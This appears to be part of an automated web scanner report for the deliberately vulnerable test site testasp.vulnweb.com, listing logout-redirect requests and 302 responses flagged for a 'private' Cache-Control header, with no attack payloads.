| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
